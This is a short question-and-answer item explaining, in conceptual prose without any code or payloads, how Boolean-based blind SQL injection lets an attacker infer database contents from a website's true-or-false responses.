When you try to guess secret data from a website's database without seeing any errors, what method uses only "yes" or "no" answers from the website to figure things out?

The method described is Blind SQL Injection, specifically Boolean-based Blind SQL Injection. SQL Injection is a web security vulnerability that allows an attacker to interfere with the queries an application makes to its database. In a Blind SQL Injection attack, the attacker does not directly see the results of the malicious SQL queries or any database errors on the web page. Instead, they deduce information by observing the application’s behavior. Boolean-based Blind SQL Injection uses the concept of "yes" or "no" answers. The attacker crafts SQL queries that evaluate to either a true or false condition within the database. The web application then responds differently based on this true or false outcome. For example, if a crafted condition is true, the web page might display a specific piece of content, load normally, or show a particular message. If the condition is false, the page might appear blank, show a generic error message, or simply not display the expected content. By carefully constructing a series of these true/false questions, the attacker can infer the content of the database character by character or bit by bit. For instance, to guess a password, an attacker might submit a query asking "Is the first character of the password 'a'?" If the application's behavior indicates a 'true' response, they know the first character is 'a'. If 'false', they would then try 'b', and so on, until the behavior indicates 'true'. This process is repeated for each character of the desired data, allowing the attacker to extract sensitive information without ever seeing direct database output or error messages.